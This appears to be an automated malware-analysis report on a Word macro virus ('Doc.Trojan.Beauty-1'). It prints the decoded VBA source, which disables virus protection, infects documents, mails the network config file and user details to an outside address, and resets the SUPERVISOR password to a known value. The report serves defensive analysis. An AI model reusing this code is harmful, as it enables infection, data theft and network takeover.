Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a legacy Word document containing VBA macros, including AutoOpen and AutoClose, which are commonly used to execute malicious code. The 'Storm' subroutine within the VBA code appears to be responsible for the malicious execution, potentially logging activity to 'C:\Storm.log'. The presence of these auto-executing macros strongly suggests an intent to download and execute a secondary payload, characteristic of a macro-based malware dropper.
Heuristics (5)
- ClamAV: Doc.Trojan.Beauty-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Beauty-1
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28225 bytes |

SHA-256 of macros.bas: 13d0e732a54ee439b8d2cb0799afde55723f0c7af35f4ea75c9c0cb1be7cb292
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "StormBringer"
' By StormBringer
' March, 2000
Dim Servidor As String
Dim CxPostal As String
Dim FullName As String
Dim DocName As String
Dim CriouScript As String
Dim AlterouNCF As String
Dim RemoviHate As String
Sub ArquivoSalvar()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Storm
ActiveDocument.Save
End Sub
Sub AutoExec()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Storm
End Sub
Sub AutoOpen()
On Error Resume Next
Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
Storm
End Sub
Sub AutoNew()
On Error Resume Next
Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
Storm
End Sub
Sub AutoClose()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Storm
End Sub
Function Storm()
On Error GoTo Sair
Application.EnableCancelKey = wdCancelDisabled
Application.DisplayAlerts = wdAlertsNone
Inicia_Variaveis
Infecta
If (Day(Now()) = 16) Then Gravar
Open "C:\Storm.log" For Append As #1
If DocName = "" Then GoTo Sair
Print #1, ""
Print #1, "Registro de " & Format(Time, "hh:mm:ss AMPM - ") & Format(Date, "dddd, d mmm yyyy")
Print #1, " " & DocName
Print #1, " " & RemoviHate
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
Print #1, " - " & ActiveDocument.VBProject.VBComponents(I).Name
Next
Close #1
Sair:
Close #1
End Function
Sub Inicia_Variaveis()
On Error GoTo Sair
Servidor = System.PrivateProfileString("MBMail.ini", "MHS", "MasterVolume")
CxPostal = System.PrivateProfileString("MBMail.ini", "MHS", "MailBox")
FullName = System.PrivateProfileString("MBMail.ini", "MHS", "FullName")
DocName = Application.ActiveDocument.Name
Sair:
End Sub
Sub Gravar()
Dim Fileorg As String
Dim FileDest As String
On Error GoTo Sair
Cria_Script
Altera_NCF
Saida = Servidor & "MHS\MAIL\SND\BABACAS1"
FileDest = Servidor & "MHS\MAIL\PARCEL\queroa5t"
Fileorg = Servidor & "ETC\NETINFO.CFG"
FileCopy Fileorg, FileDest
Open Saida For Output As #1
Print #1, "SMF-71"
Print #1, "From: " & CxPostal
Print #1, "To: StormBringer23@hotmail.com"
Print #1, "Subject: Pronto de informação"
Print #1, "Attachment-name: NetInfo.cfg"
Print #1, "Attachment-encoding: IBM-437"
Print #1, "Attachment: queroa5t"
Print #1, ""
Print #1, "Registro de " & Format(Time, "hh:mm:ss AMPM - ") & Format(Date, "dddd, d mmm yyyy")
Print #1, "WordName : " & Application.UserName
Print #1, "Documento: " & DocName
Print #1, "Servidor : " & Servidor
Print #1, "Nome NGM : " & FullName
Print #1, "Caixa Postal: " & CxPostal
Print #1, CriouScript
Print #1, AlterouNCF
Close #1
Sair:
End Sub
Sub Cria_Script()
On Error GoTo Sair
CriouScript = "Não criou script"
Saida = Servidor & "NETBASIC\UTIL\STORM.BAS"
Open Saida For Output As #1
Print #1, "#include " & Chr(34) & "net.h" & Chr(34)
Print #1, "#include " & Chr(34) & "fio.h" & Chr(34)
Print #1, ""
Print #1, "SUB CRIA"
Print #1, " BINDOBJ = NET:BINDERY:GET"
Print #1, " BINDOBJ.Type = NET_USER"
Print #1, " BINDOBJ.Name = " & Chr(34) & "SUPERVISOR" & Chr(34)
Print #1, " BINDOBJ.Password = " & Chr(34) & "SUPERVISOR" & Chr(34)
Print #1, " BINDOBJ = NET:BINDERY:SET(BINDOBJ)"
Print #1, " RETURN"
Print #1, "END SUB"
Print #1, ""
Print #1, "SUB IGUALA"
Print #1, " PROP = " & Chr(34) & "SECURITY_EQUALS" & Chr(34)
Print #1, " BIN1 = NET:BINDERY:GET(" & Chr(34) & "SUPERVISOR
```

... (truncated)